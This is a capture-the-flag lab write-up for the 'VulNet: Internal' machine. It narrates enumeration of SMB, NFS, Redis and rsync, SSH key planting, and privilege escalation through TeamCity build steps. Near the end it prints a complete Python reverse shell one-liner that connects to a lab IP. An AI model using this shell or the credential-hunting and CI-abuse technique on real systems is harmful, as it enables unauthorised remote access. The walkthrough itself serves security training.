VulNet: Internal

Scanning

Lets run nmap scan to find open ports and the services running on them.

Enumeration

Lets check port 9090 which is running SMB

Lets first look at what shares are on the system

The Shares disk is interesting , lets try to access it as an anonymous user

We were able to access it, lets cd into these directories and transfer all the files onto our machine

Lets read the services.txt file

Looks like we have the first flag.

Lets read the other files

There is nothing interesting, lets look at the other services running on the machine, lets first look at the RPC service running on port 111.

Looks like we have a directory, lets mount it onto our machine. First lets create a directory called mount and then use the command to mount the directory.

Lets look for interesting files in the directory. There is an interesting file in the redis directory.

There is a lot of information when we cat it, so lets look for pass strings so that we can get some information about the passwords and this is a configuration file

Now that we have the password, lets try to access redis and look for the second flag

We have the second flag. Now lets look at the auth Key, but we cannot GET the key so lets look at its file type

Now that we know its a list key type, lets read it.

We have a base64 strings, lets decode it

Looks like we have the credentials for the rsync service running on the system. Lets look at it in more detail and see what interesting files we can find.

Exploitation

Now we can get the files onto our machine or we can try to upload our ssh key and then login using ssh into the machine.

First we have to create our ssh key and then upload it to the machine.

Now we can login

Lets read the user flag

Privilege Escalation

Looking around there is an interesting directory

Lets look at this directory and read the readme file

Lets look at the ports running on the machine

Something is running on port 8111. Lets set up port forwarding so that we can see what is running on this port.

Now lets go to localhost:8111 in the browser.

We have a TeamCity login page. Clicking on the Super User option, we need an authentication token to login, lets look for this on the machine

grep -r "authentication token" 2>/dev/null

We have tokens, lets use one of them and login. (None of them work except the last one)

We are logged in.

Lets try to create a new project

Lets create a new Built Configuration

Now lets go to the homepage and click on the project name

Lets go to Edit Configuration Settings and then go to Built Steps and select python

Lets add a reverse shell to the Custom Script command option that we can choose

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.8.64",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Lets now start a netcat listener on our machine

Lets save the file and run it by click run.

We have a shell as root, lets read the root flag.

Last updated